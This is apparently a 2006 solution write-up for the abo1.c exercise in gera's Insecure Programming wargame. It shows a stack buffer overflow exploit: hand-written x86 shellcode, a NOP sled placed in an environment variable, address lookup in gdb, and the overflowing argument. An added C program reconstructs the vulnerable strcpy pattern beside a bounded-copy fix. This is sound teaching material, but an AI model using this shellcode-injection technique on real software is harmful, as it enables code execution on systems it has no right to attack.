/
| [exp-abo1.txt] Thu Mar 23 13:54:33 CET 2006
|
| abo1.c exploit - solution 2
| http://community.core-sdi.com/~gera/InsecureProgramming/abo1.c
|
| Copyright: bunker - http://rawlab.altervista.org
| 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2
\

/
| Put bytecode in file "bcode"
\

bunker@syn:~/abo1$ perl -e 'print "\x6a\x05\x58\x31\xc9\x51\x68\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\x66\xb9\x72\x17\xcd\x80\x89\xc3\x6a\x04\x58\x99\x52\x68\x65\x72\x65\x21\x68\x61\x73\x20\x68\x68\x65\x72\x20\x77\x68\x62\x75\x6e\x6b\x89\xe1\x6a\x10\x5a\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80"' > bcode

/
| Bytecode is 65 bytes long
\

bunker@syn:~/abo1$ wc -c bcode
65 bcode

/
| Export BCODE env with NOPx100 + bcode
\

bunker@syn:~/abo1$ export BCODE=`perl -e 'print "\x90"x100'``cat bcode`

/
| Find $BCODE address
\

bunker@syn:~/abo1$ gdb abo1
[cut]
(gdb) break main
Breakpoint 1 at 0x80483ad
(gdb) run
Starting program: /home/bunker/abo1/abo1

Breakpoint 1, 0x080483ad in main ()
(gdb) x/10s $esp
0xbffff410:      "T#ÿ·\016\032ë·*\202\004\b"
[cut]
(gdb)
0xbffffeeb:      "BCODE=", '\220' <repeats 100 times>, "j\005X1ÉQh/ttyh/dev\211ãf¹r\027Í\200\211Ãj\004X\231Rhere!has hher whbunk\211áj\020ZÍ\200j\001X1ÛÍ\200"
(gdb) x/s 0xbffffef1
0xbffffef1:      '\220' <repeats 100 times>, "j\005X1ÉQh/ttyh/dev\211ãf¹r\027Í\200\211Ãj\004X\231Rhere!has hher whbunk\211áj\020ZÍ\200j\001X1ÛÍ\200"

/
| Execute abo1, fill buffer with $BCODE address (+align)
\

bunker@syn:~/abo1$ ./abo1 `perl -e 'print "\xff\xfe\xff\xbf"x68'`
bunker was here!

/
| Boom! :D
\
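The session above works because abo1.c (linked, but not reproduced on this page) copies argv[1] into a fixed-size stack buffer with no length check, so the 68 x 4-byte repeated address (272 bytes) runs past the buffer into the saved frame pointer and return address. The C program below is an added example, not the page's or gera's code: it shows the vulnerable copy pattern as a reconstruction of abo1.c's shape (the 256-byte buffer size is an assumption) beside a bounded replacement that rejects over-long arguments, and a helper that checks how a buffer of that size treats an argument of the page's payload length.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* abo1.c copies argv[1] into a fixed-size stack buffer; 256 bytes is a
 * reconstruction of that size (assumption), not taken from this page. */
#define BUF_SIZE 256

/* Vulnerable pattern (reconstruction of abo1.c's shape): strcpy() has no
 * length limit, so an argument longer than buf[] overwrites the saved EBP
 * and the return address above it, which is what the repeated address in
 * the session targets. Shown for comparison only; never called here. */
void vulnerable_copy(const char *arg)
{
    char buf[BUF_SIZE];
    strcpy(buf, arg);
    printf("%zu bytes copied\n", strlen(buf));
}

/* Hardened replacement: copies src only if it and its NUL fit in dst.
 * Rejecting is safer than silent truncation for input that is interpreted
 * later. Returns 0 on success, -1 if src is too long or dst is unusable. */
int bounded_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;
    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    while (n < dstsize && src[n] != '\0')   /* never read past dstsize bytes */
        n++;
    if (n == dstsize)                        /* no terminator within range */
        return -1;
    memcpy(dst, src, n + 1);                 /* n + 1 <= dstsize, so it fits */
    return 0;
}

/* Builds a constructed argument of `len` non-NUL bytes (0xff, the first
 * byte of the page's repeated address) and reports whether bounded_copy
 * into a BUF_SIZE buffer accepts it: 0 = accepted, -1 = rejected. */
int accepts_arg_of_length(size_t len)
{
    char buf[BUF_SIZE];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL)
        return -1;
    memset(arg, 0xff, len);
    arg[len] = '\0';
    rc = bounded_copy(buf, sizeof buf, arg);
    free(arg);
    return rc;
}

/* Length of the page's payload: a 4-byte address repeated 68 times. */
size_t page_payload_length(void)
{
    return 4 * 68;
}

/* Copies a short string through bounded_copy and verifies the round trip. */
int roundtrip_ok(void)
{
    char buf[BUF_SIZE];
    const char *msg = "bunker was here!";   /* the string the session prints */
    return bounded_copy(buf, sizeof buf, msg) == 0 && strcmp(buf, msg) == 0;
}

int main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 2;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument rejected: longer than %d bytes\n", BUF_SIZE - 1);
        return 1;
    }
    printf("copied %zu bytes safely\n", strlen(buf));
    printf("page payload is %zu bytes, buffer holds %d: it would be rejected\n",
           page_payload_length(), BUF_SIZE - 1);
    return 0;
}
```

Run it with the same `./abo1`-style argument as in the session and the bounded version refuses the 272-byte input instead of letting it reach the return address; the same check applies to any copy of attacker-controlled data into a fixed-size buffer, not just argv.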